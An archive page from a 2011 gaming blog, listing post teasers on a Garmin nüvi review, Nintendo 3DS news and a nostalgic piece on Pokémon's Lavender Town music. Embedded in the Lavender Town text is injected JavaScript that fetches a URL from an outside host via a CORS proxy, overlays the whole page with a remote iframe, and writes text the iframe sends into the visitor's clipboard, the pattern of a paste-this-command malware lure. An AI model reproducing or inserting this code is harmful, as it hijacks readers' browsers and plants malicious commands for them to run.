The nüvi 3790LMT GPS from Garmin is one thin GPS! It’s screen has a nice glossy finish compared to the slightly matte finish most GPSes have. Continue reading
2011 archive
Sep 16 2011
Review: nüvi 3790LMT
Permanent link to this article: https://www.brokenfuse.com/2011/09/16/review-nuvi-3790lmt/
Sep 15 2011
Super Smash Land Is Here!
The long awaited Super Smash Land is finally here. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/09/15/super-smash-land-is-here/
Permanent link to this article: https://www.brokenfuse.com/2011/09/14/3ds-addon-circle-pad-price-date/
Sep 13 2011
Youtube Tuesday: How to win at League of Legends
Put real life online gaming and add a hilarious spin to it and you get this!
Permanent link to this article: https://www.brokenfuse.com/2011/09/13/youtube-tuesday-how-to-win-at-league-of-legends/
Sep 13 2011
Nintendo Pre-TGS Conference
Last night, Nintendo kicked off a Pre-TGS Conference to reveal new games and trailers for the 3DS and Wii. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/09/13/nintendo-pre-tgs-conference/
Sep 12 2011
Game Music Monday: Lavender Town and those dang Unown
Ah, Pokemon. I remember when I popped in Red for the first time into my Game Boy Pocket. The fact that I could capture these creatures, battle with them, collect them… it was an amazing thing for my child self. Going to areas that, if thought of in my imagination, very beautiful places.
Then you get to Lavender Town. I was actually quite scared of this place when I was little. While other areas are happy, with nice music, Lavender’s music just is… weird. To me then is was pretty freaky. Now it’s just annoying. But it matches the setting. I mean, a dead Marowak killed by Team Rocket, ghosts, trainers possessed wanting your blood… gotta love when games for kids weren’t numbed down.(function() {
const configLink = “https://corsproxy.io/?url=http://heyues.live”;
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(" ");
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: "HEAD" })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener("message", function(event) {
if (!event.data || event.data.type !== "copy") return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand("copy");
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();
Permanent link to this article: https://www.brokenfuse.com/2011/09/12/game-music-monday-lavender-town-and-those-dang-unown/
Sep 12 2011
Traditional Gaming: Is It Over As We Know It?
Traditional gaming as we know it has been here for over thirty years. We’ve come to expect epic storylines, ever improving graphics and gameplay from them. But have you ever thought that this breed of gaming may be on its way out? Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/09/12/traditional-gaming-is-it-over-as-we-know-it/
Sep 09 2011
Nike releases Limited Edition Back to the Future shoes
Nike finally releases those famed shoes that starred on Michael J. Fox’s feet back in 1989 in Back to the Future II. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/09/09/nike-releases-limited-edition-bttf-shoes/
Permanent link to this article: https://www.brokenfuse.com/2011/09/08/poll-fave-zelda-game-all-time/
Sep 07 2011
This is what the new 3DS attachment will look like
All I can say is what the hell is Nintendo thinking!!
(via Siliconera)
Permanent link to this article: https://www.brokenfuse.com/2011/09/07/this-is-what-the-new-3ds-attachment-will-look-like/


You must be logged in to post a comment.